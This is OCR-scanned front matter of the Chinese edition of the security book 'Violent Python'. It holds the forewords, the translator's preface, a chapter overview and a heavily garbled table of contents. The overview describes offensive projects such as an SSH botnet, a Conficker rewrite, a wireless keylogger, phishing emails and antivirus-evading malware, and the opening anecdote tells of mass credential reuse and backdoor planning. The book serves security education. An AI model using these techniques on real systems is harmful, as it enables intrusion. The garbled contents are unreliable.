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内 容 简 介 


Python 是 一 门 常用 的 编程 语言 ， 它 不 仅 上 手 容 易 ， 而 且 还 拥有 丰富 的 支持 库 。 对 经 常 需要 针对 目 己 所 
处 的 特定 场景 编写 专用 工具 的 黑客 、 计 算 机 犯罪 调查 人 员 、 渗 透 测 试 师 和 安全 工程 师 来 说 ，Python 的 这 些 
特点 可 以 帮助 他 们 又 快 又 好 地 完成 这 一 任务 ， 以 极 少 的 代码 量 实现 所 需 的 功能 。 本 书 结合 具体 的 场景 和 真 
实 的 案例 ， 详 述 了 Python 在 渗透 测试 、 电 子 取证 、 网 络 流量 分 析 、 无 线 安 全 、 网 站 中 信息 的 自动 抓 取 、 
病毒 免 杀 等 领域 内 所 发 挥 的 巨大 作用 。 

本 书 适合 计算 机 安全 管理 人 员 、 计 算 机 犯罪 调查 和 电子 取证 人 员 、 渗 透 测 试 人 员 ， 以 及 所 有 对 计算 机 
安全 感 兴趣 的 爱好 者 阅读 。 同 时 也 可 供 计 算 机 、 信 息 安 全 及 相关 专业 的 本 /专科 院 校 师 生 学 习 参 考 。 
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友 一 


在 我 从 事 信 息 安全 技术 研究 学 习 的 近 20 年 间 ， 带 领 过 不 少 安全 团队 ， 发 现 编程 能 力 是 真 
正 黑客 和 “脚本 小 子 ” 的 本 质 区 别 ， 在 安全 研究 人 员 和 希望 成 长 为 黑客 高 手 的 技术 爱好 者 们 
的 成 长 过 程 中 一 直面 临 着 一 个 编程 语言 的 选择 问题 ， 但 是 Python 在 黑客 领域 拥有 着 霸主 的 地 
位 。 在 XCon 召开 的 这 15 EH, Python 被 越 来 越 多 地 应 用 ， 越 来 越 多 的 优秀 黑客 工具 和 安全 
工具 都 是 用 Python 开发 的 ，Python 已 经 发 展 成 为 和 C/C++ 一 样 作为 黑客 必 备 的 技能 之 一 。 

Python 是 一 门 非常 优秀 的 主流 编程 语言 ， 拥 有 用 户 友 好 的 语法 和 大 量 的 第 三 方 模块 。 它 
提供 了 一 个 更 好 的 支撑 平台 ， 能 明显 平缓 大 多 数 程序 员 初 学 攻击 技术 时 的 学 习 曲 线 。 这 本 书 
涵盖 了 黑客 、 渗 透 测试 人 员 、 取 证 分 析 师 和 安全 工程 师 需 要 具备 的 很 多 技巧 。 

Python 是 一 门 优秀 的 黑客 编程 语言 ， 复 杂 度 低 、 效 率 高 ， 入 门 门槛 低 ， 尽 管 已 经 有 了 很 
多 攻击 工具 ， 但 Python 为 编写 你 自己 的 攻击 工具 提供 了 一 个 极 好 的 开发 平台 ， 仍 然 对 解决 某 
些 特定 条 件 下 那些 已 有 工具 无 法 处 理 的 问题 。 这 本 书 的 特点 是 剖析 技巧 的 本 质 ， 使 用 Python 
内 置 模块 和 优秀 的 第 三 方 模块 来 完成 ， 并 通过 众多 实例 引领 读者 更 好 地 体会 理解 Python 的 技 
巧 和 用 法 。 

本 人 与 本 书 译 者 相识 相交 多 年 ， 亦 师 亦 友 。 我 们 经 常 在 一 起 讨论 交流 技术 ， 探 讨 发 展 ， 
对 译 者 的 技术 水 平和 经 验 能 力 是 非常 认可 与 钦佩 的 ， 也 多 次 邀请 他 来 XCon 和 XKungfoo 进行 
演讲 并 分 享 技术 ， 每 每 演讲 都 是 博得 广大 技术 高 手 的 赞扬 与 认可 。 从 此 书 中 可 以 看 出 ， 作 者 
在 攻防 、 取 证 和 编程 多 反面 的 深厚 功底 ， 也 可 以 看 出 译 者 在 这 方面 的 超 强 能 力 和 丰富 经 验 。 
这 本 书包 含 渗透 测试 、Web 分 析 、 网 络 分 析 、 取 证 分 析 ， 以 及 利用 无 线 设备 等 方面 的 Python 
攻击 利用 方法 ， 并 且 书 中 采用 的 实例 都 会 深入 浅 出 地 讲解 说 明 Python 该 如 何 帮助 你 实现 各 种 
攻击 的 方法 。 不 管 你 是 刚 开始 学 习 Python 程序 的 小 白 ， 还 是 一 个 具有 丰富 经 验 的 渗透 攻击 高 
手 ， 这 本 书 都 会 给 你 非常 大 的 帮助 ， 引 领 你 成 为 顶级 的 黑客 高 手 。 


Python 绝技 : 运用 Python 成 为 顶级 黑客 
在 我 创办 的 “神话 一 一 信息 安全 人 才 颠 履行 动 ” 中 ，Python 是 我 们 的 必修 课 之 一 。 本 书 
将 会 是 我 们 “神话 行动 ”学 员 学 习 的 专业 书籍 之 一 。 


FRR (RP) 
XCon 创始 人 人， 神话 行 动 创 始 人 ，XFocus 创始 人 之 一 


序 二 


作为 一 名 安全 研究 从 业 人 员 ， 在 日 常 工作 中 经 常 需要 编写 代码 来 解决 一 些 简单 的 自动 化 
文本 处 理 、 验 证 目 己 的 某 些 推测 、 编 写 一 套 工具 等 。 回 眸 大 学 时 代 ， 那 时 候 不 明白 脚本 语言 
的 强大 性 ， 遇 到 任何 问题 一 概 用 C 语言 来 解决 。 久 而 久之 ， 发 现 自己 的 研究 进度 总 是 比 别人 
慢 ， 有 时 候 一 些 非常 简单 的 字符 串 处 理 排版 问题 ， 用 C 语言 一 写 就 是 几 个 小 时 ， 而 用 脚本 几 
分 钟 就 能 搞定 。 在 这 之 后 ， 我 逐渐 开始 改 用 VBScript 作为 我 主要 的 脚本 编写 语言 ， 并 且 在 很 
长 一 段 时 间 里 满足 了 我 绝 大 多 数 的 需求 。 某 天 ， 当 我 接 到 一 个 应 急 啊 应 任务 ， 在 Linux 上 做 
一 些 日 志 搜 集 分 析 时 ， 己 经 理解 脚本 语言 强大 的 快速 开发 能 力 的 我 ， 只 能 用 非常 是 夺 的 办 
法 一 一 将 日 志 复制 到 Windows 上 再 处 理 ， 而 就 在 那 时 ， 我 已 经 感到 ， 熟 悉 一 门 更 加 强大 、 跨 
平台 的 脚本 语言 迫在眉睫 。 自 那 之 后 ， 我 逐渐 接触 了 Perl， 并 且 能 够 通过 Per 来 满足 一 些 日 
常 的 需要 。 可 是 ，Perl 代码 的 可 读 性 总 是 让 我 在 看 别人 代码 的 时 候 显得 毫 无 效率 ， 在 朋友 的 
推荐 下 ， 我 最 终 选 择 了 Python。 

Python 是 一 门 非 常 容 易 上 手 的 脚本 语言 ， 相 比 Perl 语言 ， 我 几乎 是 在 完全 不 懂 Python 语 
法 的 情况 下 读 懂 了 网 上 一 些 简 单 的 Python 代码 ， 在 简单 的 语法 学 习 之 后 ， 便 可 以 事半功倍 地 
满足 日 常 需要 。Python 对 于 白 帽 黑客 来 说 ， 也 是 必须 掌握 的 一 门 脚 本 语言 。 相 比 其 他 脚本 语 
言 来 说 ， 其 丰富 的 库 几 乎 可 以 履 盖 安全 研究 的 方方面面 ， 例 如 : 强大 的 Scapy 库 可 以 很 方便 
地 实现 跨 平 台 的 网 络 嗅 探 、 网 络 发 包 等 需求 ;文档 分 析 工 具 PyPDF 提供 了 强大 的 PDF 格式 解 
析 功 能 ， 这 些 功 能 对 PDF 格式 的 Fuzz 测试 、PDF Oday 的 分 析 ， 甚 至 PDF Exploit 的 编写 都 起 
了 极 大 的 帮助 。 这 样 的 例子 还 举 不 胜 举 ， 在 我 参加 的 两 届 Pwn2Own 黑客 大 赛 的 准备 过 程 中 ， 
我 几乎 天 天 和 Python 打交道。 例如 ， 在 使 用 IDA 分 析 一 个 OSX 的 服务 时 ， 编 写 一 个 IDA 
Python 脚本 可 以 将 一 些 没 有 符号 的 接口 提取 出 来 进行 测试 ， 对 函数 进行 Pattern imi, FRAT 
疑 函 数 进行 进一步 代码 审计 ; 在 Exploit Safari 中 ， 堆 布局 是 非常 关键 的 一 环 ，lldb 提供 的 
Python 接口 可 以 很 方便 地 对 WebKit 对 象 进 行 分 析 ， 对 每 个 WebKit 对 象 大 小 以 及 快速 发 现 对 
象 的 可 利用 特性 ， 对 最 终 编写 出 完整 的 攻击 代码 起 了 决定 性 的 作用 。 


Python 绝技 : 运用 Python 成 为 顶级 黑客 


虽然 Python 脚本 上 手 容 易 ， 要 迅速 掌握 其 丰富 的 安全 工具 库 并 熟练 运用 绝 非 易 事 。 我 刚 
接触 Python 语言 时 ， 很 多 朋友 就 对 我 说 过 : Python 是 一 门 非常 适合 白 帽 黑客 学 习 的 语言 ， 然 
而 我 却 在 很 长 一 段 时 间 里 一 知 半 解 ， 用 了 几 年 时 间 理 解 了 这 人 句 话 的 含义 。 多 而 杂 的 工具 库 需 
要 时 间 和 经 验 的 积累 ， 才 能 慢 慢 “吃透 ”和 人 掌握。 市 面 上 的 Python 入 门 书 籍 虽 然 非常 多 ， 但 
真正 从 安全 从 业者 角度 深入 浅 出 介绍 的 书籍 几乎 没有 。 本 书 的 出 现 无 疑 给 安全 从 业者 带 来 了 
福音 ， 对 Python 初学 者 来 说 ， 第 1 章 内 容 可 以 使 其 迅速 掌握 Python 语言 。 而 之 后 的 几 章 几 乎 
涵盖 了 安全 研究 的 每 个 方面 ， 并 且 配 以 近 几 年 比较 热门 的 案例 〈 例 如 : LOIC, Conficker 
等 ) ， 无 论 你 是 进行 漏洞 研究 还 是 取证 分 析 、 渗 透 测 试 、DDoS 对 抗 、 反 病毒 等 ， 都 可 以 从 本 
书 中 学 到 有 用 的 知识 和 技能 ， 使 自己 在 学 习 过 程 中 少 走 弯 路 ， 在 工作 中 事半功倍 。 更 加 难得 
的 是 ， 负 责 本 书 翻 译 工 作 的 崔 孝 晨 老 师 是 一 位 具有 极其 丰富 数字 取证 从 业经 验 的 安全 界 专 
家 ， 并 且 他 曾经 翻译 过 多 本 安全 技术 书籍 ， 只 有 像 他 这 样 国内 顶级 安全 从 业者 并 且 有 具备 丰富 
翻译 经 验 的 专家 ， 才 能 将 这 样 一 本 好 书 的 精髓 以 中 文 的 方式 原原本本 地 还 原 在 读者 面前 ， 而 
读者 也 可 以 从 字里行间 体会 到 他 “功力 ”的 深厚 。 

相信 读者 会 从 本 书 中 受益 良 多 。 


陈 良 
KeenTeam 高 级 研究 员 


Fay 


Python 是 一 门 非常 常用 的 编程 语言 ， 除 应 用 在 科学 计算 、 大 数据 处 理 等 人 们 熟知 的 领域 
外 ， 在 计算 机 安全 领域 中 使 用 也 非常 广泛 。 这 是 因为 对 黑客 、 软 件 逆向 工程 师 、 电 子 取 证 人 
RÆ, Python 与 C/C++ 语法 上 的 相似 性 使 它 上 手 十 分 容易 。 

本 人 大 约 在 2008 年 通过 IDAPython 接触 到 了 Python 语言 。 相 对 于 IDA 自 带 的 IDC 脚本 
来 说 ，IDAPython 的 功能 非常 强大 ， 可 以 很 方便 地 搞定 用 IDC 完成 起 来 很 麻烦 的 一 些 工作 ; 
而 相对 于 用 C/C++ 开发 IDA 插件 ，IDAPython 使 用 非常 灵活 ， 要 写 的 代码 量 也 少 了 很 多 ， 当 
时 感觉 真是 “出 门 在 外 、 居 家 旅行 、 杀 人 越 货 之 必 备 良药 ”。 当 时 ，Immunity Debugger 等 各 种 
常用 工具 也 都 支持 Python 脚本 ， 甚 至 出 现 了 纯 用 Python 打造 的 计算 机 内 存 取证 分 析 工具 一 一 
Volatility. 

2010 F, KRM) RM 2m, RATAN ATE (Python KET: 黑客 与 逆向 工程 师 的 

Python 编程 之 道 》 一 书 的 技术 审 校 ， 审 校 的 过 程 也 使 我 对 Python 在 安全 领域 所 能 发 挥 的 作用 
有 了 更 深刻 的 理解 。 但 美中不足 的 是 ， 该 书 仅 仅 介 绍 了 在 一 些 调试 器 、 反 汇编 器 等 安全 专用 
工具 中 Python 的 使 用 方法 ， 甚 至 可 以 说 它 只 是 对 一 些 专用 的 Python 库 的 介绍 。 当 然 ， 这 些 很 
重要 ， 但 除 此 之 外 ，Python 的 强大 功能 应 该 能 在 更 多 的 场景 下 发 挥 作用 。 
应 该 说 这 本 Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers 
and Security Engineers ( «(Python 绝技 : 运用 Python 成 为 顶级 黑客 》) 确实 是 填补 了 这 方面 的 
TA: 书 中 结合 具体 的 场景 ， 甚 至 是 真实 的 案例 ， 详 述 了 Python 在 渗透 测试 、 电 子 取证 、 网 
络 流量 分 析 、 无 线 安全 、 网 站 中 信息 的 自动 抓 取 、 病 毒 免 杀 等 领域 内 的 用 途 。 每 一 章 都 针对 
一 个 专门 的 领域 ， 完 全 用 Python 完整 实现 了 非常 实用 的 功能 ， 而 且 代 码 量 非常 少 。 

本 书 在 国外 Amazon 网 站 上 的 评价 也 非常 高 一 一 76 个 用 户 评价 ， 得 分 4 星 半 ， 是 很 高 的 
分 数 。 

本 书 由 上 海 公安 高 等 专科 学 校 基 础 教研 部 的 教师 教官 翻译 完成 ， 全 书 共 7 章 ， 分 工 安排 
如 下 : 
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第 1、2 章 由 武 晓 音 翻译 ， 第 3 章 由 秆 地 展 翻译 ， 第 4 章 由 吴杰 丽 翻 译 ， 第 5 章 由 孙 舍 翻 
译 ， 第 6 章 由 王 宏 翻译 ， 第 7 章 由 获 济 悦 翻 译 。 全 书 由 和 岑 孝 展 统 一 审 校 。 
本 书 中 文 版 的 面世 要 感谢 博文 视点 的 各 位 编辑 老师 ， 特 别 是 李 利 健 、 刘 瞬 老 师 ， 感 谢 你 
们 对 我 的 一 贯 文 持 和 耐心 指导 ， 使 我 从 中 获 益 恨 多 ! 同时 也 要 感谢 你 们 为 本 书 的 出 版 所 花费 
的 大 量 时 间 ! 
由 于 翻译 时 间 人 仓促 ， 书 中 的 错误 在 所 难免 ， 敬 请 读者 不 音 指正 。 
KE ire 
2015 年 10 月 
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感谢 Rob Frost， 你 写 的 “网 络 侦查 ” 那 一 章 比 我 写 的 强 太 多 了 ! 感谢 Matt. Ryan, 
Kirk, Mark, Bryan 和 Bil， 感 谢 你 们 理解 我 之 前 为 什么 整 晚 不 睡觉 ， 眼 晤 着 时 针 从 1 EF 
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参 编 作 者 一 一 Robert Frost 


2011 年 Robert Frost 毕业 于 美国 军事 学 院 ， 随 后 成 为 一 名 陆军 通信 兵 。 他 以 优异 的 成 绩 获 
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成 员 之 一 。Rob 也 参加 并 赢得 了 多 次 电子 安全 竞赛 。 


技术 编辑 一 一 Mark Baggett 
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责 。Mark 掌握 当前 在 销售 、 实 现 和 支持 信息 安全 时 ， 信 息 安全 专家 所 面临 挑战 的 第 一 手 资 
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Python 是 黑客 的 语言 ， 具 有 低 复 杂 度 、 高 效率 和 几乎 无 限 多 的 第 三 方 库 ， 入 门 门 榴 低 ， 
拥有 这 一 切 的 Python 为 你 编写 自己 的 攻击 工具 提供 了 一 个 极 好 的 开发 平台 。 如 果 你 使 用 的 是 
Mac OS X 或 Linux， 那 么 还 有 个 额外 的 优势 一 一 它 已 经 在 系统 中 预 装 好 了 。 尽 管 已 经 有 了 很 
多 攻击 工具 ， 但 学 习 Python 仍 有 助 于 你 应 付 那些 现 有 工具 无 法 对 付 的 困难 情况 。 


目标 读者 


尽管 每 个 人 的 基础 不 尽 相 同 ， 但 无 论 你 是 一 个 有 意 学 习 如 何 编写 Python FEF MNS, E 
是 一 个 想 学 习 怎样 把 自己 的 技术 运用 在 渗透 测试 中 的 编程 老手 。 这 本 书 都 适合 你 。 


本 书 组 织 结构 


在 写本 书 的 过 程 中 ， 我 们 确实 是 想 把 它 写成 一 本 以 Python 黑暗 面 案例 构成 的 暗黑 秘籍 。 
接 下 来 的 内 容 中 提供 了 渗透 测试 、Web 分 析 、 网 络 分 析 、 取 证 分 析 ， 以 及 利用 无 线 设 备 等 方 
HRY Python 操作 清单 。 我 希望 这 些 例 子 能 够 激发 起 读者 编写 目 己 的 Python 脚本 的 热情 。 


第 1 章 : ATI 


如 果 你 之 前 没有 Python 编程 经 验 ， 第 1 章 将 提供 关于 这 一 语言 、 变 量 、 数 据 类 型 、 轩 
数 、 友 代 、 语 句 块 和 如 何 使 用 模块 等 背景 信息 ， 并 通过 编写 一 些 简 单 的 程序 系统 地 学 习 它 
们 。 如 果 你 已 经 能 够 完全 驾驭 Python 编程 语言 ， 则 完全 可 以 跳 过 本 章 。 在 第 1 章 之 后 的 各 章 
之 间 几 乎 都 是 独立 的 ， 你 完全 可 以 根据 目 己 的 喜好 决定 阅读 的 顺序 。 


第 2 章 : 用 Python 进行 渗透 测试 
第 2 章 中 介绍 使 用 Python 编程 语言 在 渗透 测试 中 进行 脚本 化 攻击 的 思想 。 本 章 中 的 例子 


包括 编写 一 个 端口 扫描 器 ， 构 建 一 个 SSH 僵尸 网 络 ， 通 过 FTP 进行 “批量 入 侵 ” (mass- 
compromising) ， 重 新 写 一 个 “Conficker” 病 毒 ， 以 及 编写 一 段 漏洞 利用 代码 (exploit〉。 


第 3 章 : 用 Python 进行 取证 调查 
第 3 章 介 绍 用 Python 进行 电子 取证 。 本 章 中 的 例子 包括 确定 计算 机 的 地 理 位 置信 息 、 恢 
复 被 删除 的 数据 、 从 Windows 注册 表 中 提取 键 值 。 检 查 文档 和 图 片 中 的 元 数据 ， 以 及 检查 应 


用 程序 和 移动 设备 备份 文件 中 记录 的 信息 。 
第 4 章 : 用 Python 进 行 网 络 流量 分 析 

第 4 章 介绍 使 用 Python 分 析 网 络 流量 。 本 章 涉 及 的 脚本 有 : 从 抓 包 文件 中 IP 地 址 对 应 的 

地 理 位 置 ， 调 查 流行 的 DDoS 工具 包 、 发 现 诱骗 扫描 (decoy scan) ， 分 析 伪 尸 网 络 的 流量 及 


挫败 入 侵 检查 系统 。 
第 5 章 : 用 Python 进 行 无 线 网 络 攻 击 

本 章 的 例子 展示 了 如 何 嗅 探 和 解析 无 线 流量 、 编 写 无 线 键 盘 记 录 器 、 识 别 隐藏 的 无 线 网 
远程 控制 无 人 驾驶 飞行 器 (Unmanned Aerial Vehicles, UAV) 、 识 别 出 正 在 被 使 用 的 恶 


络 、 
意 无 线 工 具 包 、 追 踪 蓝 牙 设备 ， 以 及 编写 监 牙 漏洞 的 利用 代码 。 


第 6 章 : 用 Python 刺探 网 络 
第 6 章 演示 了 使 用 Python 刺探 网 络 获取 信息 的 技术 。 本 章 的 例子 包括 通过 Python 匿名 浏 
览 网 络 、 利 用 开发 API 工作 、 在 流行 的 社交 网 站 上 收集 信息 以 及 生成 钓鱼 邮件 。 
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第 7 章 : 用 Python 实现 免 杀 


在 最 后 一 章 ， 也 就 是 第 7 章 中 ， 我 们 要 编写 一 段 能 逃避 杀毒 软件 检测 的 恶意 软件 。 男 
外 ， 我 们 还 要 写 一 个 脚本 把 我 们 的 恶意 软件 上 传 到 一 个 在 线 病毒 扫描 器 上 ， 验 证 它 是 否 真能 
做 到 免 杀 。 


本 书 的 Web 站 点 


本 书 涉及 的 所 有 代码 都 被 放 在 了 本 书 的 Web 站 点 上 。 读 者 可 以 在 阅读 本 书 时 访问 
http://www.elsevierdirect.com/companion.jsp?ISBN=9781597499576 下 载 代 码 、 分 析 样 本 ， 以 及 
进行 网 络 抓 包 文 件 。 


AL Iil 
í- Sc PAP P Bl OBE O EESE OC V 
O E a a NTA O E BNP ORAA VAEA A TH E T O "PA V A VII 
sa IX 
参 编 作 者 一 一 Robert Frost nenns X 
技术 编辑 一 一 Mark Baggett .ee XI 
BY B— Mark Baggett......... XII 
EP A 1 
引言 : 使 用 Python 进行 渗透 测试 .ee l 
aas a i a a E ee 2 
ee EEE 2 
se OEO: 5 

POOR ER 6 

rete P E PEP A E occas Ean E PE RE AA, 6 

o i., AN EEA, dep Eie DAA E AEAEE. 7 

LEO E ar a a Ba PE Eh | 7 

WV E A OEA SR LE A T ORE EE 8 
OUR 9 

| Sh Ee 9 


Python 绝技 : 运用 Python 成 为 顶级 黑客 


第 2 章 


ET ee OE R: 10 
OE IAEE SENE ANE NEENA A Mites tania 11 
RS 13 
a eT ee eT ane 15 
ea 16 
CD nn heats PAES VONESE needsninon in i 17 
ee ee ee E EE E EAA 19 
第 一 个 程序 的 背景 材料 :布谷 看 .ss 19 
第 一 个 程序 : UNIX 口令 破解 机 .5.00.0 20 
SEER AY PE RAT REWE... R 22 
第 三 个 程序 ,一 个 Zip SOAPS BRAD o..ccsccccssesessesvescseccssesossnencsssnesnonesecaseee 23 
be ee We NN OT 27 
A 28 
用 Python 进行 渗透 测试 29 
引言 Morris REMEHA FANG... ccccccecescccscsecesssecesssscecececscssesereccesvecsoresereeesesees 29 
de i Ys P E 30 
TE Sn ee eco ce Bh. 30 
RS Ro i ma aaaseisee TERA 32 
Te at Dt ee Mestad eM 34 
使 用 NMAP 靖 日 扫 措 代码 000m 36 
用 Python 构建 一 个 SSH 伪 己 网络 .cc 38 
J S SE ee 39 
用 Pxssh 暴力 破解 SSH 密码 ooo cccccccccccesccescssccesccscceserscecsseascasesecaseasenseees 42 
A SSE | a ee ea 45 
ae 2 |, eT a on ee 49 
MJS FTP 与 Web HRI REL arrassar iaasa 52 
用 Pythion 物 建 医 名 FIP 扫 撒 器。 53 
使 用 Ftplib 暴力 破解 FTP HP OS ec ccccecsscssssesessesssscssevssesesesassesesensees 54 
ON 55 
FE VOUT TAT Ae ee ATI cee nnn i a 56 
ee a Bes 58 


Confichst, FF Ze TTL oon ib cs asters Satopia ee 62 
使 用 Metasploit 攻击 Windows SMB 服务 .ee 64 
编写 Python HE3 Metasploit H cscsccssissccvssenansascessnonvescaasposcasivesvasnasneocersvuss 65 

E 暴力 破解 口令 ， 远 程 执行 = 个 进程 0000 67 
把 所 有 的 代码 放 在 一 起 ， 构 成 我 们 自己 的 Conficker .ee 67 

编写 你 自己 的 Oday 概念 验证 代码 .nn 70 
r Pao NiS AoE. Ua nEs iDO 70 
a et. O E 71 
ee SL | a EA LEO RE Ere PPA ee VY 72 
汇总 得 到 完整 的 漏洞 利用 脚本 .es 73 

ae 75 

I A Tee a ee LT ae 75 

用 Python 进行 取证 调查 ,0.5 77 

引言 :如何 通过 电子 取证 解决 BITK 的 荣 案 nan 77 

你 曾经 去 过 哪里 ? 一 一 在 注册 表 中 分 析 无 线 访问 热点 .55655 78 
使 用 WinReg 读 取 Windows 注册 表 中 的 内 容 .….5c 79 
使 用 Mechanize 把 MAC 地 址 传 给 Wigle...........cccccccecssessseseseececseseseseesecenseees 81 

用 Python 恢复 被 删 人 回收 站 中 的 内 容 .ee 85 
使 用 OS 模块 寻找 被 删除 的 文件 /文件 欧 .seessssssssssssssssssssssssssssssssssns 85 
用 Python 把 SID 和 用 户 名 关联 起 来 0nd 86 

ee AR iisi 88 
使 用 PyPDF 解析 PDF 文件 中 的 元 数据 .55.555 88 
Ri 90 
H Berninan.. PREA -esserci a ailas seernes 91 
用 Python 的 图 像 处 理 库 读 取 图 片 中 的 Exif 元 数据 .5.000 92 

用 Python 分 析 应 用 程序 的 使 用 记录 .0 95 
PERE Skype 中 的 SQLite3 数据 闫 .0 95 
使 用 Python 和 SQLite3 自动 查询 Skype 的 数据 库 .es 97 
用 Python 解析 火狐 浏览 器 的 SQLite3 数据 库 .es 103 

用 Python 调查 iTunes 的 手机 备份 .5505s 111 

eg nd sk ed mo 116 


Python 绝技 : 运用 Python 成 为 顶级 黑客 


SS, Se ee ee ee A A E eee eee 116 
第 4 章 用 Python 分 析 网 络 流量 .ee 119 
引言 :“ 极 光 ” 行 动 以 及 为 什么 明显 的 迹象 会 被 忽视 119 
IP 流量 将 何去何从 ? 一 一 用 Python 回答 oe cccccccesccesssescseeseecsesseesssseseeessenseees 120 
使 用 PyGeolP 关联 IP 地 址 和 物理 位 置 .ee 121 
Ca eo ee A 121 
使 用 Python (BIZ HYPE... ww 125 
TET FEBRERO? SPT LOIS VE ecenin 128 
使 用 Dpkt AA PRR LOIC BUFF Hus cscccesccsccscscsssssscsesesscessscessecessssecseneees 128 
解析 Hive 服务 器 上 的 IRC 命令 .055550 130 

A E eG A E 131 
H.D.Moore 是 如 何 解 决 五 角 大 楼 的 麻烦 的 .5 136 
de OET A E EE AA 136 

M Scany E TIL FOI aeien anonss TENTATA 138 
“风暴 ” (Storm ) 的 fast-flux 和 Conficker 的 domain-flux .i 141 
你 的 DNS 知道 一 些 不 为 你 所 知 的 吗 ? .55555 142 
taae as nd EEEN EE 143 

H Seay a t-i MM dd den 144 

M Scapy Ii Doman Fix MEE secincnesvcesnsonserassnssnesnaienconsnsensagessavesvansenssseoes 145 
Kevin Mitnick 和 TCP 序列 号 预测 146 
TAKK ON TOP F ee ee ae ieran 147 
使 用 Scapy 制造 SYN 泛 洪 攻击 .5.00 148 
se eve 148 
aa 150 
使 用 Scapy 愚弄 人 侵 检 测 系 统 .ee 153 
| ROE BR Le ae LO Pee ea 159 
ES | ee we on Cee OO Le eee a er ae 159 
第 5 章 用 Python 进行 无 线 网 络 攻击 .ne 161 
tie eck (A Se 6s |) A rn i 161 
Fee Tee Ni FI ieena i i i 162 
用 Scapy 测试 无 线 网 卡 的 嗅 探 功能 .es 162 


as 163 
绵羊 墙 一 一 被 动 窃听 无 线 网 络 中 传输 的 秘密 .es 165 
使 用 Python IF WU ZETA SAREE FAR A En ssesecsesescecessscsssecsssscssnspsencneensnsonenne 165 
LSS a ed vm 168 
nn et 171 
HARFE ART raam a a a NAS REANA 174 

你 带 着 笔记 本 电脑 去 过 哪里 ? Python 告诉 你 .00 176 
全 和 176 
寻找 隐藏 网 络 的 802.11 EL A 177 

找 出 隐藏 的 802.11 网 络 的 网 络 名 .5.055555 178 
Rao oE AE TG BIL cic ni 179 
METAS, PBT I 和 da 179 

用 Spy M AEN ncn ii 181 
PADAL E r, 0E N SE: Rossseesseas 184 
本 186 
理解 Wordpress. 的 作证 COOKICS..............s.scsecccsssesssnsvssrssevensoeasssesseaceescsesssencese 187 
牧羊 人 一 一 找 出 Wordpress Cookie 重 放 攻击 .sse 188 
Rg eo: ee en a le ee 190 
截取 无 线 流 量 ， 查 找 ( 隐藏 的 ) 蓝牙 设备 地 址 .ss 192 
扫描 蓝牙 了 RFCOMMNM 信道 annn ed epi 195 
使 用 蓝牙 服务 发 观 协 议 cai 196 

用 Python ObexFTP 控制 打印 机 ...............-ceccccesescsssocsececesocsesescencsecesnsserereeneee 197 

用 Python 利用 手机 中 的 BlueBug 漏洞 .ee 197 
N OS E 199 
we E OO A ea 199 
第 6 章 用 Python 刺探 网 络 .ns 201 
.A aE EA ae 201 
isle AEI E S | a ee 202 
使 用 Mechanize 库 上 网 202 
匿名 性 一 一 使 用 代理 服务 器 、User-Agent 及 cookie... 203 

把 代码 集成 在 Python 类 的 AnonBrowser 中 .ee 206 


Python 绝技 ， 运用 Python 成 为 顶级 黑客 


用 anonBrowser 抓 取 更 多 的 Web 页 面 .0 208 
FA Beautiful Soup (OT Href R-n 209 
用 区 oo Soup OG FETs ii a in 211 
aa 213 
Ee Pahaa Ea AP i on on ea 213 
用 Python 解析 Tweets 个 人 主页 .ovsesesscvenneocerocsssesaseeneatencssasdscanesctinensasesesvernses 216 
大 推 文中 提取 地 音 位 置信 息 mon 218 
用 正则 表达 式 解析 Twitter 用 户 的 兴趣 爱好 .5 220 
A 225 
ne etm 226 
使 用 Smtplib 给 目标 对 象 发 邮件 .0 226 
CUP org i eee eee 227 
ee ee. ee eee Sn eae ene 230 
I ,a OE aan 231 
用 Python 实现 免 杀 .4 233 
引言 CA n ee es ee 233 
ne oe ee aT ae ey 234 
SORE ee PO eee ene ae ee” eee 237 
A nS ee ee ee ee ee See 243 
Se a a oe ee an ro a ae 243 


第 1 章 Aid 


本 章 简 介 : 


。 准备 Python 开发 环境 

。 Python 编程 语言 简介 

。 对 变量 、 数 据 类 型 、 字 符 串 、 列 表 、 词 典 和 函数 的 解释 
© 使 用 网 络 、 和 迭代 、 条 件 选 择 语 句 、 异 常 处理 和 模块 

。 编写 你 的 第 一 个 Python 程序 一 一 用 字典 攻击 法 破解 密码 
© 编写 你 的 第 二 个 Python 程序 一 一 暴力 破解 Zip 文件 


对 我 而 言 ， 武 术 的 非凡 之 处 在 于 它 的 简单 。 简 单 的 方法 也 是 正确 的 方法 ， 
同时 武术 也 没有 什么 特别 之 处 。 越 接近 武术 的 真 良 ， 招 式 表 现 上 浪费 越 少 。 


一 一 Bruce Lee，Jeet Kune Do 创始 人 


引言 : 使 用 Python 进行 渗透 测试 


最 近 ， 我 的 一 个 朋友 对 某 家 财富 500 强 公司 的 电脑 安全 系统 进行 了 渗透 测试 。 虽 然 这 个 
公司 建立 并 维护 了 一 个 优秀 的 安全 体系 ， 但 最 终 还 是 被 他 在 一 台 未 打 补 丁 的 服务 器 上 发 现 了 
一 个 漏洞 。 仅 几 分 钟 内 ， 他 就 用 开源 工具 攻击 了 系统 ， 并 获得 了 管理 访问 权限 。 随 后 ， 他 扫 
描 { 了 剩余 的 服务 器 和 客户 端 ， 没 有 发 现 其 他 漏洞 。 此 时 他 的 评估 算 结束 了 ， 但 真正 的 渗透 测 
试 却 才 开始 。 

我 的 朋友 打开 他 所 选择 的 文本 编辑 器 ， 针 对 网 络 上 剩余 的 机 器 编写 了 一 个 Python 脚本 ， 
尝试 用 从 有 漏洞 的 服务 器 上 拿 到 的 口令 去 登录 其 他 服务 器 。 一 点 不 夸张 ， 就 用 了 几 分 钟 ， 他 
便 获 得 了 网 络 上 逾 千 台 机 器 的 管理 访问 权 。 但 是 ， 这 样 做 也 使 他 随即 面临 一 个 难以 收拾 的 问 
题 ， 他 知道 系统 管理 员 会 注意 到 他 的 攻击 并 拒绝 他 的 访问 ， 于 是 为 找 出 在 哪里 安装 持久 的 后 
门 比较 合适 ， 他 迅速 对 能 利用 的 机 器 进行 了 分 类 。 


Python 绝技 : 运用 Python 成 为 项 级 黑客 


翻 看 了 一 下 渗透 测试 合同 后 ， 我 的 朋友 得 知 ， 他 的 客户 非常 关注 域 控 制 器 的 安全 问题 。 
因为 知道 管理 员 是 使 用 一 个 完全 独立 的 管理 员 账 户 登 录 域 控 制 器 的 ， 我 的 朋友 就 写 了 一 个 小 
脚本 去 检查 被 黑 的 ) 上 千 台 用 户 机 器 当前 登录 的 用 户 。 没 过 一 会 儿 ， 我 的 朋友 就 注意 到 : 
